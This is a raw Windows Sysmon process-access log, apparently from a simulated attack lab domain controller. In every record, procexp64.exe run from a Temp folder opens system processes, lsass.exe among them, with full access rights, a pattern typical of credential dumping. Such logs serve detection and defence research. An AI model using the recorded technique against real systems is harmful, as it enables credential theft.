15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789350Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789349Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789348Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789347Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789346Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789345Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789344Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789343Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789342Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789341Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789340Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789339Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789338Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789337Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789336Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789335Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789334Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789333Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789332Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789331Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789330Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789329Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789328Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789327Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789326Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789325Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789324Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789323Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789322Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789321Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789320Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789319Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789318Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789317Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789316Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789315Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789314Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789313Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 